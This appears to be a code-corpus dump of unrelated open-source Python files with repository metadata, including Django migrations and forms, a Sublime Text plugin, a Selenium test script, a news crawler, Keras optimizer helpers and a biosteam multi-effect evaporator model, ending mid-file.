pages = extract_pagenum(bs) releases = extract_releases(bs) return releases, pages def main(args): ids = [int(i) for i in args] with ThreadPoolExecutor(max_workers=10) as executor: pagenums = {} for id in ids: pagenums[executor.submit(get_pagenum, id)] = id results = {} for s in as_completed(pagenums): id = pagenums[s] first_page, pages = s.result() # According to the doc, you are not meant to do that (unless you # are writing tests or Executors), however, to keep the code # simple, I'm doing exactly that. first_future = Future() first_future.set_result(first_page) results[id] = [first_future] for p in range(2, pages + 1): results[id].append(executor.submit(get_releases_page, id, p)) for i in ids: for p in as_completed(results[i]): for r in p.result(): print(r) if __name__ == '__main__': main(sys.argv[1:])
3af8d10bbadf2fdca7a947a941b05ec04733c02e
3b4306f01497a65c539e68f7dde61b03d66feee4
/Server/play/server/migrations/0005_auto_20170216_1702.py
b9ad0de8478e2a3c9508ed8ae5f10e0ac74ff9d2
[]
no_license
Ricky1O11/Play
4b17914cec081064caac64454fa6ccf9e62c44aa
5d153efded279179c7c0f0541b8676ae7a2d8e9e
refs/heads/master
2021-01-11T23:49:56.210161
2017-06-17T14:30:59
2017-06-17T14:30:59
78,632,836
0
1
null
2017-04-19T13:59:39
2017-01-11T11:32:53
CSS
UTF-8
Python
false
false
510
py
# -*- coding: utf-8 -*- # Generated by Django 1.10.1 on 2017-02-16 16:02 from __future__ import unicode_literals from django.db import migrations, models import django.utils.timezone class Migration(migrations.Migration): dependencies = [ ('server', '0004_matches_status'), ] operations = [ migrations.AlterField( model_name='matches', name='time', field=models.DateTimeField(blank=True, default=django.utils.timezone.now), ), ]
e1a45c0ba518cfbb372a72ab3143bef40ec1f554
a6645dd580d8d3dcf56f178822628d261ed309bd
/LastModifiedIndicator.py
96eb8e4a065bff2bee64968ceca9556c8df76015
[ "MIT" ]
permissive
joemay/SublimeLastModifiedIndicator
ddb7f68e64fb4ea45b8c4c1f3922938608b17f05
03d6e404b6bcf49ff94b8086bf5adce0055799c0
refs/heads/master
2021-01-18T00:21:26.629616
2013-07-31T18:55:43
2013-07-31T18:55:43
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,532
py
import sublime_plugin import sublime import os BASE_PATH = os.path.abspath(os.path.dirname(__file__)) IMG_PATH = os.path.join('..', os.path.basename(BASE_PATH), 'img') settings = sublime.load_settings('LastModifiedIndicator.sublime-settings') class LastModifiedIndicator(object): def __init__(self, view): self.view = view self.sel = self.view.sel() self.has_sel = len(self.sel) == 1 @property def _range(self): return range(-3, 4) if settings.get('last_modified_indicator_multiline', True) else range(0, 1) def run(self): if self.has_sel: self.erase_regions() line = self.view.rowcol(self.view.sel()[0].begin())[0] for i in self._range: _line = line + i if _line < 0: continue point = self.view.full_line(self.view.text_point(_line, 0)) if os.path.exists(os.path.join(BASE_PATH, 'img', '%d%s' % (abs(i), '.png'))): self.view.add_regions('lmi-outline-%d' % i, [point, ], 'lmi.outline.%d' % i, os.path.join(IMG_PATH, str(abs(i))), sublime.HIDDEN) def erase_regions(self): if self.has_sel: for i in range(-3, 4): self.view.erase_regions('lmi-outline-%d' % i) class LastModifiedIndicatorEventHandler(sublime_plugin.EventListener): def on_modified(self, view): if settings.get('last_modified_indicator', True): LastModifiedIndicator(view).run()
9b0d5d65cf309b37a68a89e87ed66843ec5ca8ce
ecace2496db4d51e19c3507295db2be25fc2474b
/for_test.py
1ee787f062d8273a11dced60d6280bc6d0631f59
[]
no_license
calior/selenium
37a077a8ba4cd3265f066c1e853074b9caad4e1c
9cd93fa3a14e1e747fd0435f82567760ed50370d
refs/heads/master
2021-01-13T03:55:19.086355
2016-08-01T03:34:24
2016-08-01T03:34:24
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,858
py
from selenium import webdriver from time import sleep from get_Screen import get_Screen from isElementExist import isElementExist def before_xuezha(driver): flag = True #先行测试循环做题页面,学渣路线 while(flag): try: #print('herezuoti') if flag == isElementExist(driver,'id','continue'): print ("------00000------------------------") get_Screen(driver) #driver.find_element_by_id('continue').click() flag = False #获取先行测试截图 driver.find_element_by_xpath('/html/body/div[4]/div').click() #试题页面点击下一步 continue-submit-answer driver.find_element_by_class_name('layui-layer-btn0').click() #点击确定 #print('走到这了m') except Exception as e: print(e) def while_lianxi_no(driver): flag = True while(flag): sleep(2) print ("===================22222222===============") driver.find_element_by_id('continue').click()#点击视频页面下一步 sleep(5) print ("===================33333333===============") sleep(2) driver.find_element_by_id('continue').click()#点击讲义页面下一步 print ("===================444444===============") sleep(2) flag1 = True while(flag1): sleep(2) print ("===================55555===============") driver.find_element_by_id('continue-submit-answer').click() #练习题点击下一步 driver.find_element_by_class_name('layui-layer-btn0').click() #点击确定 driver.find_element_by_id('continue-submit-answer').click() #解析卡页面点击下一步 print ("===================6666===============") sleep(2) if(flag1 == isElementExist(driver,'id','continue')): get_Screen(driver) driver.find_element_by_id('continue').click() flag1 = False elif(flag == isElementExist(driver,'link','专题报告')): get_Screen() flag = False
8ef8624175a17aa4a76c7c2d3978fe26aa352c4a
5ee8514d98c3f5f8b06129916da7f40138ddaee2
/src/Sanga/media/ttv.py
44d1939ed3645cecf4b5895ea781b4402f40ffa2
[ "MIT", "Python-2.0" ]
permissive
allenyummy/Sanga
a9acc0d98db6eae14be2bb8d640f9ae98919f601
ff4cc60e0fd05cac49bdf15ad8a57dfedcf75fd0
refs/heads/master
2023-07-27T07:46:32.930955
2021-09-01T08:54:14
2021-09-01T08:54:14
401,222,669
2
0
MIT
2021-09-01T08:54:15
2021-08-30T05:06:59
Python
UTF-8
Python
false
false
1,072
py
# encoding=utf-8 # Author: Yu-Lun Chiang # Description: Get news import logging from typing import Dict import json from bs4 import BeautifulSoup from .base import BaseMediaNewsCrawler from ..struct import NewsStruct logger = logging.getLogger(__name__) class TTV(BaseMediaNewsCrawler): """Web Crawler for TTV News""" def getInfo(self, link: str) -> NewsStruct: return super().getInfo(link) @staticmethod def _get_script_info( soup: BeautifulSoup, ) -> Dict[str, str]: # use 1-st element (0-indexed) script_info_str = soup.find_all("script", type="application/ld+json")[1].string script_info_dict = json.loads(script_info_str) logger.debug(f"SCRIPT_INFO_STR:\n {script_info_str}") logger.debug(f"SCRIPT_INFO_DICT:\n {script_info_dict}") return script_info_dict @staticmethod def _get_content( soup: BeautifulSoup, ) -> str: content = soup.find("div", itemprop="articleBody").text logger.debug(f"CONTENT:\n {content}") return content
755ce3602c7d4642c4b0aca6891d7446594eb0b1
48fff0f472066dc6e5b5a15d16dcc33738e7a2c2
/train2/chatbot/broadcast.py
027badb7eddef0c0ba8411820cb20092bd9088f5
[]
no_license
hasadna/OpenTrainCommunity
228a4f078829f6653e62db1294da01488be55b64
3c7a941b730160c40cc400ed94ed77ffa9189f0a
refs/heads/master
2023-01-23T14:39:10.462114
2020-06-08T11:36:27
2020-06-08T11:36:27
19,729,986
23
16
null
2023-01-13T22:57:43
2014-05-13T07:34:15
HTML
UTF-8
Python
false
false
1,036
py
import logging from django.conf import settings import telegram from django.template.loader import render_to_string from . import models logger = logging.getLogger(__name__) def broadcast_new_report_to_telegram_channel(report: models.ChatReport): message = render_to_string('chatbot/new_report_message.html', context={ 'report': report, }) _broadcast(message) def broadcast_wrong_report_to_telegram_channel(report: models.ChatReport): message = render_to_string('chatbot/wrong_report_message.html', context={ 'report': report, }) _broadcast(message) def _broadcast(message: str): channel = '@' + settings.TELEGRAM_CHANNEL try: bot = telegram.Bot(settings.TELEGRAM_TOKEN) bot.send_message( channel, message, parse_mode='html', disable_web_page_preview=True) logger.info("Broadcasting to channel %s:\n%s", channel, message) except Exception: logger.exception('Failed to broadcast to channel')
1a4331aa03052d0136ac9424cf6c3d97e49dc9fc
4a2bd14eb54a5447b9b5c67df97d9237cd506bd7
/setup.py
61fde968a06933af9c27eabc838e71e919e782a8
[]
no_license
GapData/bokehutils
85363af5d1575983fe980a7c5a269eab354d168d
deadedd7a8a2210beeb8cce226d7d566f84a6f11
refs/heads/master
2021-05-29T13:40:12.105135
2015-09-30T19:40:03
2015-09-30T19:40:03
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,608
py
# Copyright (C) 2015 by Per Unneberg from setuptools import setup, find_packages import glob import versioneer INSTALL_REQUIRES = [ 'sphinx>=1.3', 'pytest', 'pytest-cov>=1.8.1', 'bokeh>=0.10.0', ] try: # Hack for readthedocs if not 'readthedocs' in os.path.dirname(os.path.realpath(__file__)): pass else: print("readthedocs in path name; assuming we're building docs @readthedocs") INSTALL_REQUIRES.append('sphinx-bootstrap-theme') except: pass # Integrating pytest with setuptools: see # https://pytest.org/latest/goodpractises.html#integrating-with-distutils-python-setup-py-test from distutils.core import setup, Command # you can also import from setuptools class PyTest(Command): user_options = [] def initialize_options(self): pass def finalize_options(self): pass def run(self): import subprocess import sys errno = subprocess.call([sys.executable, 'runtests.py']) raise SystemExit(errno) _version = versioneer.get_version() _cmdclass = versioneer.get_cmdclass() setup(name="bokehutils", version=_version, cmdclass=_cmdclass, author="Per Unneberg", author_email="[email protected]", description="Utility functions for working with bokeh plots", license="MIT", scripts=glob.glob('scripts/*.py'), install_requires=INSTALL_REQUIRES, packages=find_packages(exclude=['ez_setup', 'test*']), package_data={ 'bokehutils': [ '_templates/*', 'static/*', ], })
321314e44b4f791b9d4b22fcbb22c398352b26bb
406043e9639bd3195f2bb952bb64e59568c1eade
/manage.py
904a6d8cf60630a0b9a3373d3075275e1a982ad3
[]
no_license
Mattaru/Pet-shelter-django
2e8571c8e4f490180a69fca363734a320bb1a441
4f59ca3c62c0eb1462716af69f150535979094f8
refs/heads/master
2023-01-02T13:47:07.987525
2020-10-30T15:37:20
2020-10-30T15:37:20
308,047,259
0
1
null
null
null
null
UTF-8
Python
false
false
670
py
#!/usr/bin/env python """Django's command-line utility for administrative tasks.""" import os import sys def main(): """Run administrative tasks.""" os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'animal_shelter.settings') try: from django.core.management import execute_from_command_line except ImportError as exc: raise ImportError( "Couldn't import Django. Are you sure it's installed and " "available on your PYTHONPATH environment variable? Did you " "forget to activate a virtual environment?" ) from exc execute_from_command_line(sys.argv) if __name__ == '__main__': main()
8f51618dff92b6609f174e7d9e48161f653dd784
fdba533d128e5fcc237abacda12de9545ddce39c
/keras/optimizer_experimental/optimizer_lib.py
d180179dde8284a872030aa0a8c1237796c3da4d
[ "Apache-2.0" ]
permissive
hhuang97/keras
5949d754dcaed47df011fb4218d6552251e265e2
f5fea878c271e38946c6681c1c2434e72d0ab977
refs/heads/master
2021-12-24T00:01:26.759181
2021-12-14T18:21:47
2021-12-14T18:22:26
90,206,289
0
1
null
2017-05-04T00:54:28
2017-05-04T00:54:28
null
UTF-8
Python
false
false
3,775
py
"""Library of helper classes of optimizer.""" class GradientsClipOption: """Gradients clip option for optimizer class. Attributes: clipnorm: float. If set, the gradient of each weight is individually clipped so that its norm is no higher than this value. clipvalue: float. If set, the gradient of each weight is clipped to be no higher than this value. global_clipnorm: float. If set, the gradient of all weights is clipped so that their global norm is no higher than this value. """ def __init__(self, clipnorm=None, clipvalue=None, global_clipnorm=None): if clipnorm is not None and global_clipnorm is not None: raise ValueError(f"At most one of `clipnorm` and `global_clipnorm` can " f"be set. Received: clipnorm={clipnorm}, " f"global_clipnorm={global_clipnorm}.") if clipnorm and clipnorm <= 0: raise ValueError("Clipnorm should be a positive number, but received " f"clipnorm={clipnorm}.") if global_clipnorm and global_clipnorm <= 0: raise ValueError("global_clipnorm should be a positive number, but " f"received global_clipnorm={global_clipnorm}.") if clipvalue and clipvalue <= 0: raise ValueError("clipvalue should be a positive number, but received " f"clipvalue={clipvalue}.") self.clipnorm = clipnorm self.global_clipnorm = global_clipnorm self.clipvalue = clipvalue def get_config(self): return { "clipnorm": self.clipnorm, "global_clipnorm": self.global_clipnorm, "clipvalue": self.clipvalue, } class EMAOption: # TODO(b/207532340): Add examples on how to use this EMAOption. """EMA option for optimizer class. Attributes: use_ema: boolean, default to False. If True, exponential moving average (EMA) is applied. EMA consists of computing an exponential moving average of the weights of the model (as the weight values change after each training batch), and periodically overwriting the weights with their moving average. ema_momentum: float, default to 0.99. Only used if `use_ema=True`. This is the momentum to use when computing the EMA of the model's weights: `new_average = ema_momentum * old_average + (1 - ema_momentum) * current_variable_value`. ema_overwrite_frequency: int or None, default to 100. Only used if `use_ema=True`. Every `ema_overwrite_frequency` steps of iterations, we overwrite the model variable by its stored moving average. If None, we do not overwrite model variables in the middle of training, and users need to explicitly overwrite the model variable by calling `finalize_variable_update()`. """ def __init__(self, use_ema=False, ema_momentum=0.99, ema_overwrite_frequency=100): self.use_ema = use_ema if use_ema: # Verify the arguments related to EMA. if ema_momentum > 1 or ema_momentum < 0: raise ValueError("`ema_momentum` must be in the range [0, 1]. " f"Received: ema_momentum={ema_momentum}") if ema_overwrite_frequency and (not isinstance( ema_overwrite_frequency, int) or ema_overwrite_frequency < 1): raise ValueError( "`ema_overwrite_frequency` must be an integer > 1 or None. " f"Received: ema_overwrite_frequency={ema_overwrite_frequency}") self.ema_momentum = ema_momentum self.ema_overwrite_frequency = ema_overwrite_frequency def get_config(self): return { "use_ema": self.use_ema, "ema_momentum": self.ema_momentum, "ema_overwrite_frequency": self.ema_overwrite_frequency, }
bd3c3547ce4abf96e60ac062c02860678ddc568c
59147b0d69ee93d69d2a33e3315d3aeff569edd1
/selection/forms.py
4e2ed9316a7d479379eb1591262fe98dd8f39aaa
[]
no_license
mansimishra007/Hostel-Management-System
abf1148ae83c07922ea93a7cf0272eb598addf92
65704ef73265226f1a247aff2a4fd2c7234ba900
refs/heads/main
2023-04-19T02:38:48.804216
2021-04-29T13:16:21
2021-04-29T13:16:21
362,712,183
0
0
null
2021-04-29T06:24:37
2021-04-29T06:24:36
null
UTF-8
Python
false
false
2,347
py
from django.contrib.auth.forms import UserCreationForm from .models import * from django import forms from django.core.exceptions import ValidationError import datetime YEARS= [x for x in range(2018,2020)] class UserForm(UserCreationForm): password1 = forms.CharField(min_length=8, max_length=30, widget=forms.PasswordInput(render_value=False)) class Meta: model = User fields = ['username', 'password1', 'password2'] help_texts = { 'username': 'same as your smart card id', } # def clean_password(self): # password = self.cleaned_data.get('password1') # if len(password) < 8: # raise ValidationError('Password too short') # return super(UserCreationForm, self).clean_password1() class LoginForm(forms.Form): username = forms.CharField() password = forms.CharField(widget=forms.PasswordInput) class RegistrationForm(forms.ModelForm): class Meta: model = Student fields = [ 'student_name', 'father_name', 'smart_card_id', 'course', 'year_of_study', 'dob'] class SelectionForm(forms.ModelForm): class Meta: model = Student fields = ['room'] class DuesForm(forms.Form): choice = forms.ModelChoiceField(queryset=Student.objects.all().filter(no_dues=True)) class NoDuesForm(forms.Form): choice = forms.ModelChoiceField(queryset=Student.objects.all().filter(no_dues=False)) class DateInput(forms.DateInput): input_type = 'date' class LeaveForm(forms.ModelForm): start_date = forms.DateField(initial=datetime.date.today, widget=forms.SelectDateWidget(years=YEARS)) end_date = forms.DateField(initial=datetime.date.today, widget=forms.SelectDateWidget(years=YEARS)) reason = forms.CharField(max_length=100, help_text='100 characters max.', widget=forms.TextInput(attrs={'placeholder': 'Enter Reason here'})) class Meta: model = Leave fields = [ 'start_date', 'end_date', 'reason'] class RepairForm(forms.ModelForm): class Meta: model = Room fields = ['repair'] class RebateForm(forms.Form): rebate = forms.DateField(initial=datetime.date.today, widget=forms.SelectDateWidget(years=YEARS))
be2c52cf09bf34f008f12e37cdf45e5043e77334
d44a2cc528a71ba68da73d8246d00a582bd37d50
/django-env/bin/wheel
ae025c6ff6359ee62788a3c0f12a62a7306d8b96
[ "Apache-2.0" ]
permissive
ShanghaitechGeekPie/bookshelf
7127a56023e7509e2c2fd53dd42aeb508fc16098
bc3469ecbb44723bb28ccaaccee60d211ca3f94a
refs/heads/master
2020-03-13T04:12:26.937041
2018-08-26T13:19:10
2018-08-26T13:19:10
130,958,787
2
2
null
null
null
null
UTF-8
Python
false
false
250
#!/home/django/bookshelf/shelf/django-env/bin/python3.5 # -*- coding: utf-8 -*- import re import sys from wheel.tool import main if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit(main())
6a9813e8183140d4f37cce18fe72fbf348307aa9
e41849b424e892c0ef1325ec768f4a5aa6dc11e5
/biosteam/units/_multi_effect_evaporator.py
ae5f2bda8e39b53c5a21f2db763537ba2cc004ca
[ "LicenseRef-scancode-unknown-license-reference", "MIT", "NCSA" ]
permissive
Saurajyoti/biosteam
28a8548ec9c453124e31d73c4e3d628d44dad322
65d35586c9e40660f170e5a8aa4e4450ea171a23
refs/heads/master
2023-06-15T22:07:54.544645
2021-07-13T04:19:14
2021-07-13T04:19:14
null
0
0
null
null
null
null
UTF-8
Python
false
false
16,479
py
# -*- coding: utf-8 -*- # BioSTEAM: The Biorefinery Simulation and Techno-Economic Analysis Modules # Copyright (C) 2020-2021, Yoel Cortes-Pena <[email protected]> # # This module is under the UIUC open-source license. See # github.com/BioSTEAMDevelopmentGroup/biosteam/blob/master/LICENSE.txt # for license details. """ """ import numpy as np import biosteam as bst from .. import Unit from .mixing import Mixer from .heat_exchange import HXutility from ._flash import Flash, Evaporator_PQ from .design_tools import ( compute_vacuum_system_power_and_cost, compute_heat_transfer_area ) from thermosteam import MultiStream, settings import flexsolve as flx from warnings import warn from .design_tools import heat_transfer as ht __all__ = ('MultiEffectEvaporator',) log = np.log exp = np.exp # Table 22.32 Product process and design (pg 592) # Name: ('Area range (m2)', 'Cost(A) (USD)', 'U (kJ/(hr*m2*K)))', 'Material') evaporators = {'Horizontal tube': ((9.29, 743.224), lambda A, CE: CE*2.304*A**0.53, 4906.02, 'Carbon steel'), 'Long-tube vertical': ((9.29, 743.224), lambda A, CE: CE*3.086*A**0.55, 8176.699, 'Carbon steel'), 'Forced circulation': ((13.935, 8000), lambda A, CE: CE/500*exp(8.2986 + 0.5329*log(A*0.0929)-0.000196*log(A*0.0929)**2), 10731.918, 'Carbon steel'), 'Falling film': ((13.935, 371.612), lambda A, CE: CE*7.416*A**0.55, 10220.874, 'Stainless steel tubes/Carbon steel shell')} class MultiEffectEvaporator(Unit): """ Creates evaporatorators with pressures given by P (a list of pressures). Adjusts first evaporator vapor fraction to satisfy an overall fraction evaporated. All evaporators after the first have zero duty. Condenses the vapor coming out of the last evaporator. Pumps all liquid streams to prevent back flow in later parts. All liquid evaporated is ultimately recondensed. Cost is based on required heat transfer area. Vacuum system is based on air leakage. Air leakage is based on volume, as given by residence time `tau` and flow rate to each evaporator. Parameters ---------- ins : stream Inlet. outs : stream sequence * [0] Solid-rich stream. * [1] Condensate stream. P : tuple[float] Pressures describing each evaporator (Pa). V : float Molar fraction evaporated as specified in `V_definition` (either overall or in the first effect). V_definition : str, optional * 'Overall' - `V` is the overall molar fraction evaporated. * 'First-effect' - `V` is the molar fraction evaporated in the first effect. Examples -------- Concentrate sugar setting vapor fraction at the first effect: >>> import biosteam as bst >>> from biorefineries.cornstover import chemicals >>> bst.settings.set_thermo(chemicals) >>> feed = bst.Stream('feed', Water=1000, Glucose=100, ... AceticAcid=0.5, HMF=0.1, Furfural=0.1, ... units='kg/hr') >>> E1 = bst.MultiEffectEvaporator('E1', ins=feed, outs=('solids', 'liquid'), ... V=0.1, V_definition='First-effect', ... P=(101325, 73581, 50892, 32777, 20000)) >>> E1.simulate() >>> E1.show() MultiEffectEvaporator: E1 ins... [0] feed phase: 'l', T: 298.15 K, P: 101325 Pa flow (kmol/hr): Water 55.5 AceticAcid 0.00833 Furfural 0.00104 HMF 0.000793 Glucose 0.555 outs... [0] solids phase: 'l', T: 333.24 K, P: 20000 Pa flow (kmol/hr): Water 20.6 AceticAcid 0.00189 Furfural 7.39e-05 HMF 0.000793 Glucose 0.555 [1] liquid phase: 'l', T: 352.12 K, P: 101325 Pa flow (kmol/hr): Water 34.9 AceticAcid 0.00643 Furfural 0.000967 >>> E1.results() Multi-Effect Evaporator Units E1 Power Rate kW 5.72 Cost USD/hr 0.447 Low pressure steam Duty kJ/hr 5.8e+05 Flow kmol/hr 14.9 Cost USD/hr 3.55 Cooling water Duty kJ/hr -3.49e+05 Flow kmol/hr 239 Cost USD/hr 0.116 Design Area m^2 11 Volume m^3 1.64 Purchase cost Condenser USD 5.35e+03 Evaporators USD 9.59e+03 Liquid-ring pump USD 1.24e+04 Total purchase cost USD 2.74e+04 Utility cost USD/hr 4.12 Concentrate sugar setting overall vapor fraction: >>> import biosteam as bst >>> from biorefineries.cornstover import chemicals >>> bst.settings.set_thermo(chemicals) >>> feed = bst.Stream('feed', Water=1000, Glucose=100, ... AceticAcid=0.5, HMF=0.1, Furfural=0.1, ... units='kg/hr') >>> E1 = bst.MultiEffectEvaporator('E1', ins=feed, outs=('solids', 'liquid'), ... V=0.1, V_definition='Overall', ... P=(101325, 73581, 50892, 32777, 20000)) >>> E1.simulate() >>> E1.show() MultiEffectEvaporator: E1 ins... [0] feed phase: 'l', T: 298.15 K, P: 101325 Pa flow (kmol/hr): Water 55.5 AceticAcid 0.00833 Furfural 0.00104 HMF 0.000793 Glucose 0.555 outs... [0] solids phase: 'l', T: 354.94 K, P: 50892 Pa flow (kmol/hr): Water 50 AceticAcid 0.0069 Furfural 0.000579 HMF 0.000793 Glucose 0.555 [1] liquid phase: 'l', T: 361.2 K, P: 101325 Pa flow (kmol/hr): Water 5.55 AceticAcid 0.00143 Furfural 0.000462 >>> E1.results() Multi-Effect Evaporator Units E1 Power Rate kW 5.72 Cost USD/hr 0.447 Low pressure steam Duty kJ/hr 3.82e+05 Flow kmol/hr 9.85 Cost USD/hr 2.34 Cooling water Duty kJ/hr -1.15e+05 Flow kmol/hr 78.5 Cost USD/hr 0.0383 Design Area m^2 1.64 Volume m^3 0.986 Purchase cost Condenser USD 3.89e+03 Evaporators USD 2.77e+03 Liquid-ring pump USD 1.24e+04 Total purchase cost USD 1.91e+04 Utility cost USD/hr 2.83 """ line = 'Multi-Effect Evaporator' _units = {'Area': 'm^2', 'Volume': 'm^3'} _F_BM_default = {'Evaporators': 2.45, 'Liquid-ring pump': 1.0, 'Condenser': 3.17} _N_outs = 2 _N_heat_utilities = 2 #: Residence time (hr) tau = 0.30 # Evaporator type _Type = 'Forced circulation' # Data for simmulation and costing _evap_data = evaporators[_Type] @property def Type(self): """Evaporation type.""" return self._Type @Type.setter def Type(self, evap_type): try: self._evap_data = evaporators[evap_type] except KeyError: dummy = str(evaporators.keys())[11:-2] raise ValueError(f"Type must be one of the following: {dummy}") self._Type = evap_type @property def V_definition(self): """[str] Must be one of the following: * 'Overall' - Defines attribute `V` as the overall molar fraction evaporated. * 'First-effect' - Defines attribute `V` as the molar fraction evaporated in the first effect. """ return self._V_definition @V_definition.setter def V_definition(self, V_definition): V_definition = V_definition.capitalize() if V_definition in ('Overall', 'First-effect'): self._V_definition = V_definition else: raise ValueError("V_definition must be either 'Overall' or 'First-effect'") def __init__(self, ID='', ins=None, outs=(), thermo=None, *, P, V, V_definition='Overall'): Unit.__init__(self, ID, ins, outs, thermo) self.P = P #: tuple[float] Pressures describing each evaporator (Pa). self.V = V #: [float] Molar fraction evaporated. self.V_definition = V_definition self._V_first_effect = None self._reload_components = True self.components = {} def reset_cache(self): self._reload_components = True def load_components(self): P = self.P thermo = self.thermo # Create components self._N_evap = n = len(P) # Number of evaporators first_evaporator = Flash(None, outs=(None, None), P=P[0], thermo=thermo) # Put liquid first, then vapor side stream evaporators = [first_evaporator] for i in range(1, n): evap = Evaporator_PQ(None, outs=(None, None, None), P=P[i], Q=0, thermo=thermo) evaporators.append(evap) condenser = HXutility(None, outs=[None], thermo=thermo, V=0) condenser.parent = self self.heat_utilities = (first_evaporator.heat_utilities[0], condenser.heat_utilities[0]) mixer = Mixer(None, outs=[None], thermo=thermo) components = self.components components['evaporators'] = evaporators components['condenser'] = condenser components['mixer'] = mixer # Set-up components other_evaporators = evaporators[1:] first_evaporator.ins[:] = [i.copy() for i in self.ins] # Put liquid first, then vapor side stream ins = [first_evaporator.outs[1], first_evaporator.outs[0]] for evap in other_evaporators: evap.ins[:] = ins ins = [evap.outs[1], evap.outs[0]] def _V_overall(self, V_first_effect): first_evaporator, *other_evaporators = self.components['evaporators'] first_evaporator.V = V_overall = V_first_effect first_evaporator._run() for evap in other_evaporators: evap._run() V_overall += (1. - V_overall) * evap.V return V_overall def _V_overall_objective_function(self, V_first_effect): return self._V_overall(V_first_effect) - self.V def _run(self): out_wt_solids, liq = self.outs ins = self.ins if self.V == 0: out_wt_solids.copy_like(ins[0]) for i in self.heat_utilities: i.empty(); i.heat_exchanger = None liq.empty() self._reload_components = True return if self._reload_components: self.load_components() self._reload_components = False if self.V_definition == 'Overall': P = tuple(self.P) self.P = list(P) for i in range(self._N_evap-1): if self._V_overall(0.) > self.V: self.P.pop() self.load_components() self._reload_components = True else: break self.P = P self._V_first_effect = flx.IQ_interpolation(self._V_overall_objective_function, 0., 1., None, None, self._V_first_effect, xtol=1e-9, ytol=1e-6, checkiter=False) V_overall = self.V else: V_overall = self._V_overall(self.V) n = self._N_evap # Number of evaporators components = self.components evaporators = components['evaporators'] condenser = components['condenser'] mixer = components['mixer'] last_evaporator = evaporators[-1] # Condensing vapor from last effector outs_vap = last_evaporator.outs[0] condenser.ins[:] = [outs_vap] condenser._run() outs_liq = [condenser.outs[0]] # list containing all output liquids # Unpack other output streams out_wt_solids.copy_like(last_evaporator.outs[1]) for i in range(1, n): evap = evaporators[i] outs_liq.append(evap.outs[2]) # Mix liquid streams mixer.ins[:] = outs_liq mixer._run() liq.copy_like(mixer.outs[0]) mixed_stream = MultiStream(None, thermo=self.thermo) mixed_stream.copy_flow(self.ins[0]) mixed_stream.vle(P=last_evaporator.P, V=V_overall) out_wt_solids.mol = mixed_stream.imol['l'] liq.mol = mixed_stream.imol['g'] def _design(self): if self.V == 0: return # This functions also finds the cost A_range, C_func, U, _ = self._evap_data components = self.components evaporators = components['evaporators'] Design = self.design_results Cost = self.baseline_purchase_costs CE = bst.CE first_evaporator = evaporators[0] heat_exchanger = first_evaporator.heat_exchanger hu = heat_exchanger.heat_utilities[0] duty = first_evaporator.H_out - first_evaporator.H_in Q = abs(duty) Tci = first_evaporator.ins[0].T Tco = first_evaporator.outs[0].T hu(duty, Tci, Tco) Th = hu.inlet_utility_stream.T LMTD = ht.compute_LMTD(Th, Th, Tci, Tco) ft = 1 A = abs(compute_heat_transfer_area(LMTD, U, Q, ft)) first_evaporator.baseline_purchase_costs['Evaporator'] = C = C_func(A, CE) self._evap_costs = evap_costs = [C] # Find condenser requirements condenser = components['condenser'] condenser._summary() Cost['Condenser'] = condenser.purchase_cost # Find area and cost of evaporators As = [A] A_min, A_max = A_range evap = evaporators[-1] for evap in evaporators[1:]: Q = evap.design_results['Heat transfer'] if Q <= 1e-12: As.append(0.) evap_costs.append(0.) else: Tc = evap.outs[0].T Th = evap.outs[2].T LMTD = Th - Tc A = compute_heat_transfer_area(LMTD, U, Q, 1.) As.append(A) if settings.debug and not A_min < A < A_max: warn(f'area requirement ({A}) is out of range, {A_range}') evap_costs.append(C_func(A, CE)) self._As = As Design['Area'] = A = sum(As) Design['Volume'] = total_volume = self._N_evap * self.tau * self.ins[0].F_vol Cost['Evaporators'] = sum(evap_costs) # Calculate power power, cost = compute_vacuum_system_power_and_cost( F_mass=0, F_vol=0, P_suction=evap.outs[0].P, vessel_volume=total_volume, vacuum_system_preference='Liquid-ring pump') Cost['Liquid-ring pump'] = cost self.power_utility(power)
859652d89a14584f5e955cc3ad819c804f555e3b
5bfca95abf14f7bb0ff29b58b018fc9062d3f837
/apps/first_draft/migrations/0001_initial.py
ac8c2856ce7f990fcbd46afa84be29c6e4323981
[]
no_license
wdudek82/django-ogame-clone
621afb20ea2dd3c0f2e4b93dfdd604e0628bd7b8
472971da826d078176a5d619b3b5cad89e3d1c5c
refs/heads/master
2021-09-08T15:19:49.407650
2017-11-26T19:14:48
2017-11-26T19:14:48
124,670,158
0
0
null
null
null
null
UTF-8
Python
false
false
3,675
py
# -*- coding: utf-8 -*- # Generated by Django 1.11.7 on 2017-11-15 20:31 from __future__ import unicode_literals from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Building', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=255, unique=True)), ('base_cost', models.PositiveIntegerField()), ], ), migrations.CreateModel( name='PlayerBuilding', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('level', models.PositiveIntegerField(default=0)), ('acceleration', models.PositiveIntegerField(choices=[(1, 0), (2, 1), (3, 2), (4, 3), (5, 4), (6, 5), (7, 6), (8, 7), (9, 8), (10, 9), (11, 10), (12, 11), (13, 12), (14, 13), (15, 14), (16, 15), (17, 16), (18, 17), (19, 18), (20, 19), (21, 20), (22, 21), (23, 22), (24, 23), (25, 24), (26, 25), (27, 26), (28, 27), (29, 28), (30, 29), (31, 30), (32, 31), (33, 32), (34, 33), (35, 34), (36, 35), (37, 36), (38, 37), (39, 38), (40, 39), (41, 40), (42, 41), (43, 42), (44, 43), (45, 44), (46, 45), (47, 46), (48, 47), (49, 48), (50, 49), (51, 50), (52, 51), (53, 52), (54, 53), (55, 54), (56, 55), (57, 56), (58, 57), (59, 58), (60, 59), (61, 60), (62, 61), (63, 62), (64, 63), (65, 64), (66, 65), (67, 66), (68, 67), (69, 68), (70, 69), (71, 70), (72, 71), (73, 72), (74, 73), (75, 74), (76, 75), (77, 76), (78, 77), (79, 78), (80, 79), (81, 80), (82, 81), (83, 82), (84, 83), (85, 84), (86, 85), (87, 86), (88, 87), (89, 88), (90, 89), (91, 90), (92, 